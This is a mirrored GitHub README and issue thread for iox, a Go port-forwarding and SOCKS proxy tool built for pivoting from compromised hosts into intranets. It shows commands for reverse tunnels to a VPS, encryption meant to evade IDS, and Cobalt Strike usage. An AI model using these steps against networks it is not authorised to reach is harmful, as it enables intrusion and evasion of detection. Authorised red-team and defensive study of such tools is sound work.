Giter Club home page Giter Club logo

iox's Introduction

iox

English | 中文

Tool for port forward & intranet proxy, just like lcx/ew, but better

Why write?

lcx and ew are awesome, but can be improved.

When I first used them, I can't remember these complicated parameters for a long time, such as tran, slave, rcsocks, sssocks.... The work mode is clear, why do they design parameters like this(especially ew's -l -d -e -f -g -h)

Besides, I think the net programming logic could be optimized.

For example, while running lcx -listen 8888 9999 command, client must connect to :8888 first, then :9999, in iox, there's no limit to the order in two ports. And while running lcx -slave 1.1.1.1 8888 1.1.1.1 9999 command, lcx will connect two hosts serially, but it's more efficient to connect in concurrent, as iox does.

What's more, iox provides traffic encryption feature (it's useful when there is a IDS on target). Actually, you can use iox as a simple ShadowSocks.

And iox also provides UDP traffic forward.

Of course, because iox is written in Go, the static-link-program is a little large, raw program is 2.2MB (800KB after UPX compression)

Features

  • Traffic encryption (optional)
  • Humanized CLI option
  • Logic optimization
  • UDP traffic forward
  • TCP multiplexing in reverse proxy mode

Usage

You can see, all params are uniform. -l/--local means listen on a local port; -r/--remote means connect to remote host

Note: after v0.4, -l/--local could specify which IP to listen on. If only ports are specified, the default is 0.0.0.0:PORT

-l 127.0.0.1:9999      -l *127.0.0.1:9999      # 127.0.0.1:9999
-l 9999                -l *9999                # 0.0.0.0:9999

`-l :9999` is also OK, but it's not recommended. Because `-l *:9999`(listen on 0.0.0.0:9999 with encryption) is ambiguous

Working mode

fwd

Listen on 0.0.0.0:8888 and 0.0.0.0:9999, forward traffic between 2 connections

./iox fwd -l 8888 -l 9999

Listen on 0.0.0.0:8888, forward traffic to 1.1.1.1:9999

./iox fwd -l 8888 -r 1.1.1.1:9999

Connect 1.1.1.1:8888 and 1.1.1.1:9999, forward between 2 connection

./iox fwd -r 1.1.1.1:8888 -r 1.1.1.1:9999

proxy

Start Socks5 server on 0.0.0.0:1080

./iox proxy -l 1080

Start Socks5 server on be-controlled host, then forward to internet VPS

VPS forward 0.0.0.0:9999 to 0.0.0.0:1080

You must use in a pair, because it contains a simple protocol to control connecting back

./iox proxy -r 1.1.1.1:9999
./iox proxy -l 9999 -l 1080       // notice, the two port are in order


for ew:
./ew -s rcsocks -l 1080 -e 9999
./ew -s rssocks -d 1.1.1.1 -e 9999

Then connect intranet host

# proxychains.conf
# socks5://1.1.1.1:1080

$ proxychains rdesktop 192.168.0.100:3389

Enable encryption

For example, we forward 3389 port in the intranet to our VPS

// be-controller host
./iox fwd -r 192.168.0.100:3389 -r *1.1.1.1:8888 -k 656565


// our VPS
./iox fwd -l *8888 -l 33890 -k 656565

It's easy to understand: traffic between be-controlled host and our VPS:8888 will be encrypted, the pre-shared secret key is 'AAA', iox will use it to generate seed key and nonce (Normally, nonce shouldn't be reused. But consider that iox's encryption is only for bypassing IDS, in order not to allocate extra space, the TCP stream encryption will reuse the nonce), then encrypt with Xchacha20 (replace AES-CTR with Xchacha20 in v0.3 version)

So, the * should be used in pairs

./iox fwd -l 1000 -r *127.0.0.1:1001 -k 000102
./iox fwd -l *1001 -r *127.0.0.1:1002 -k 000102
./iox fwd -l *1002 -r *127.0.0.1:1003 -k 000102
./iox proxy -l *1003 -k 000102


$ curl google.com -x socks5://127.0.0.1:1000

Using iox as a simple ShadowSocks

// ssserver
./iox proxy -l *9999 -k 000102


// sslocal
./iox fwd -l 1080 -r *VPS:9999 -k 000102

UDP forward

Only need to add CLI option -u

./iox fwd -l 53 -r *127.0.0.1:8888 -k 000102 -u
./iox fwd -l *8888 -l *9999 -k 000102 -u
./iox fwd -r *127.0.0.1:9999 -r 8.8.8.8:53 -k 000102 -u

NOTICE: When you make a multistage connection, the Remote2Remote-UDP-mode must be started last, which is the No.3 command in above example

UDP forwarding may have behavior that is not as you expected. Actually, on GitHub now, there are only examples of forwarding a local listener to a remote host, so I can only implement them with my understanding

You can find why in the source code. If you have any ideas, PR / issue are welcomed

License

The MIT license

iox's People

Contributors

eddieivan01 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

iox's Issues

当我用加密通信的iox的时候,socks5不支持

 ./i0x proxy -l *9999 -l *1080 -k 656565
[*] Reverse socks5 server handshake ok from ip:42410 (encrypted: true)
[*] Socks5 server is listening on 0.0.0.0:1080 (encrypted: true)

但是我用proflxer的socks5测试失败,而且,无法连接到目标内网,请问如何解决?之前也出过同样的问题,但是不加密就可以了
图片

关于proxy代理模式

按照例子

在vps:
./iox proxy -l 9999 -l 1080

在被控肉鸡:
./iox proxy -l 1080

然后在./iox proxy -r 1.1.1.1:9999 要是能设计成./iox proxy -l 1080 -r 1.1.1.1:9999 本地开启sokcs5服务并转发到远程, 一条命令不就更加清晰了嘛

==================================

然而使用端口转发的socks服务更加稳定:
vps:
iox fwd -l 9999 -l 1080

肉鸡:
iox proxy -l 1080 启动socks5服务
iox fwd -r 127.0.0.1:1080 -r 1.1.1.1:9999 将本地socks5服务转发到vps

攻击者:
curl -x "socks5://1.1.1.1:1080" -s -k http://10.0.0.1:9200

server与client多路复用功能

使用chrome等浏览器挂上socks5代理后,通常访问一个网页会建立多个tcp链接,从netio代码看会导致server与client间建立多个tcp连接,能否加入多路复用功能,使用一个tcp连接进行控制,一个tcp连接传输数据?

portforward command

Can someone please help me the equivalent of this command with IOX

rportfwd [bind port] [forward host] [forward port] --- > this is the way I can do it in Cobalt strike

How can I do it with IOX?
for example if I am doing this in Cobalt rportfwd 8004 10.8.0.x 443 how would I do it with IOX?

0.5版本

大佬,请问0.5版本什么时候发布啊,我看已经有0.5的分支了。

Docker 方案

请求添加docker 方案,3proxy 直接被抓包了,且容器堵住

Portforward

Can someone please help me the equivalent of this command with IOX

rportfwd [bind port] [forward host] [forward port] --- > this is the way I can do it in Cobalt strike

How can I do it with IOX?
for example if I am doing this in Cobalt rportfwd 8004 10.8.0.x 443 how would I do it with IOX?

正向socks代理实现多路复用

情况:A 端能正向访问 B 端的某个端口,想通过 A 端走 socks 服务访问 B 端后的网络,如果在 B 段 iox proxy -l xxx 可以满足需求,但这样如果连接过多 A 端与 B 端的TCP连接会很多,并且 A -> B 的socks 暂时是明文的

解决思路:iox 支持正向 proxy 功能, A -> B 建立 iox 的多路复用连接,在 A 端开启 socks 连接到 B 端
如:

      A: iox rproxy -l 1080 -r B:111
      B: iox rproxy -l 111

正向socks5 支持加上加密吗?

在本地 0.0.0.0:1080启动Socks5服务

./iox proxy -l 1080

加上用户名密码防止被扫描到利用
类似cobalt strike 直接加上端口,用户名密码即可使用

typo error?

Malformed args. The number of -l and -n is wrong
是否应该修改为:
Malformed args. The number of -l and -r is wrong

Not hexadecimal string

keep getting this issue
keep getting this error when I try to run the port forward [*] Tasked beacon to list files in . [+] host called home, sent: 19 bytes [-] could not open C:\Windows\Temp\*: 5 [*] cd c:\users\public [*] Tasked beacon to upload /root/Downloads/taowu-cobalt-strike-english/script/iox.exe as iox.exe [+] host called home, sent: 1046589 bytes [+] host called home, sent: 1040460 bytes [+] host called home, sent: 228371 bytes [*] Tasked beacon to run: iox.exe fwd -r 127.0.0.1:3389 -r *8.8.8.8:3389 -k 65535 [+] host called home, sent: 86 bytes [+] received output: Not hexadecimal string

能否支持使用配置文件

例如在iox.conf文件中分段填写好不同的转发规则
然后利用-c 加载配置文件,方便管理
./iox -c iox.conf

连接被断开

[+] C:\Windows\system32\cmd.exe /C iox.exe proxy -r xxxx:9999 :
[!] Control connection has been closed, exit now

i/o timeout

any idea why the tool si giving me this error

beacon> shell iox.exe fwd -l 9004 -r 10.8.0.86:443
[] Tasked beacon to run: iox.exe fwd -l 9004 -r 10.8.0.86:443
[+] host called home, sent: 67 bytes
[+] received output:
[
] Forward between :9004 and 10.8.0.86:443

[+] received output:
[!] Connect remote 10.8.0.86:443 error: dial tcp 10.8.0.86:443: i/o timeout
[!] Connect remote 10.8.0.86:443 error: dial tcp 10.8.0.86:443: i/o timeout

[+] received output:
[!] Connect remote 10.8.0.86:443 error: dial tcp 10.8.0.86:443: i/o timeout

[+] received output:
[!] Connect remote 10.8.0.86:443 error: dial tcp 10.8.0.86:443: i/o timeout

[+] received output:
[!] Connect remote 10.8.0.86:443 error: dial tcp 10.8.0.86:443: i/o timeout
[!] Connect remote 10.8.0.86:443 error: dial tcp 10.8.0.86:443: i/o timeout

[+] received output:
[!] Connect remote 10.8.0.86:443 error: dial tcp 10.8.0.86:443: i/o timeout
[!] Connect remote 10.8.0.86:443 error: dial tcp 10.8.0.86:443: i/o timeout

提问

作者你好,请问一下fwd与proxy两种模式各表示什么意思呢,本人为初学者,望答知

HcK?

HI, GUYS YOUR TOOL IS SO COOL BUT.. THERE ARE SOME UNFIRENDLY CONNECTIONS.....

"Using iox as a simple ShadowSocks-like"具有加密处理吗?

hi.
在服务器上,我运行了:
iox proxy -l 19999 -k 000102

在本机上,我运行了:
iox fwd -l 1081 -r VPS-public-ip:19999 -k 000102
然后设置本地机器上的浏览器的socks5代理为127.0.0.1:1081,浏览器确实可以翻墙,但从2边的参数看,总感觉没有做加密处理似的。
谢谢回复

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.